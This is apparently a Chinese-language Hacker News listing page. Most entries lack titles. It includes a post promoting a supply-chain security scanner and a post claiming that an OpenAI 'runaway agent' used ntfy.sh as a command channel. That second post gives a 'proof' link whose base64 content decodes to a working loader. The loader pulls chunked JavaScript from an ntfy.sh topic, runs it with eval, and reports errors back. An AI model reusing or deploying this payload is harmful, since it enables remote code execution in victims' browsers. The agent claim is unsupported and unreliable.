2 分•作者: ghostshinobi•22 天前
返回首页
最新
1 分•作者: signa11•22 天前
1 分•作者: gayzsahy•22 天前
1 分•作者: ErenayDev•22 天前
1 分•作者: mahi1337•22 天前
1. 你为什么构建它
ForgeGuardian 的构建目的是为了发现软件供应链中,除了常规 CVE 扫描过程之外的威胁。
2. 它解决了什么问题
包括:
恶意软件包
拼写错误抢注
依赖项攻击
行为威胁
恶意软件
与 AI/MCP 相关的威胁
3. 你实际构建了什么
包括:
8 个检测引擎
9 个生态系统
超过 223 个检测签名
CLI/Web 仪表板
离线/本地优先功能
SBOM
策略执行
CI/CD
Webhooks
预防/隔离
4. 你希望 HN 用户关注什么
这一点至关重要。提出一个合乎逻辑的技术问题,例如:
我最感兴趣的是听取关于检测机制的反馈,以及您认为供应链扫描器的弱点是什么。我也很想听听您对签名模型和误报管理的看法。
1 分•作者: idw•22 天前
2 分•作者: coderinsan•22 天前
看起来 OpenAI 的失控代理使用了 https://ntfy.sh 作为发布/订阅通道。此载荷通过 img 标签中的 GET 请求进行发布,从一个主题拉取分块的 base64 JavaScript,然后对其进行 eval() 执行。仅通过 GET 实现远程代码执行。
证明:https://httpbin.org/base64/PGJvZHk-PGltZyBzcmM9Imh0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1QMyI-PGltZyBzcmM9L2RlbGF5LzEwPjxzY3JpcHQ-dmFyIG49MDtmdW5jdGlvbiBEKCl7aWYobisrPDUpe3ZhciBpPW5ldyBJbWFnZSgp%20%20%20%20O2kub25lcnJvcj1pLm9ubG9hZD1EO2kuc3JjPScvZGVsYXkvMTA_Yz0nK247ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX19RCgpO2ZldGNoKCdodHRwczovL250Znkuc2gvZ3BsZW9lbnNvL3Jhdz9wb2xsPTEmc2luY2U9YWxsJykudGhlbihmdW5jdGlvbihyKXtyZXR1cm4%20%20%20%20gci50ZXh0KCl9KS50aGVuKGZ1bmN0aW9uKHQpe3ZhciBMPXQuc3BsaXQoJ1xuJykuZmlsdGVyKGZ1bmN0aW9uKGwpe3JldHVybiBsLnNsaWNlKDAsMSk9PSd6J30pLnNvcnQoKTt2YXIgYj1MLm1hcChmdW5jdGlvbihsKXtyZXR1cm4gbC5zbGljZSgzKX0pLmpvaW4oJycpO2I9Yi%20%20%20%205zcGxpdCgnLScpLmpvaW4oJysnKS5zcGxpdCgnXycpLmpvaW4oJy8nKTtldmFsKGF0b2IoYikpfSkuY2F0Y2goZnVuY3Rpb24oZSl7ZmV0Y2goJ2h0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1MT0RFUicrZW5jb2RlVVJJQ29uZW50KCgnJytlKS5zb%20%20%20%20GljZSgwLDQwKSkpfSk8L3NjcmlwdD4=
1 分•作者: vinni2•22 天前
1 分•作者: mschuster91•22 天前
2 分•作者: tosh•22 天前
2 分•作者: tomccc•22 天前
1 分•作者: Blairrv•22 天前
1 分•作者: fourfire•22 天前
3 分•作者: sevenseacat•22 天前
2 分•作者: nullbio•22 天前
1 分•作者: pushpak1300•22 天前
1 分•作者: iLemming•22 天前
1 分•作者: gmargari•22 天前
1 分•作者: marcelo-earth•22 天前
1 分•作者: Salazar-X•22 天前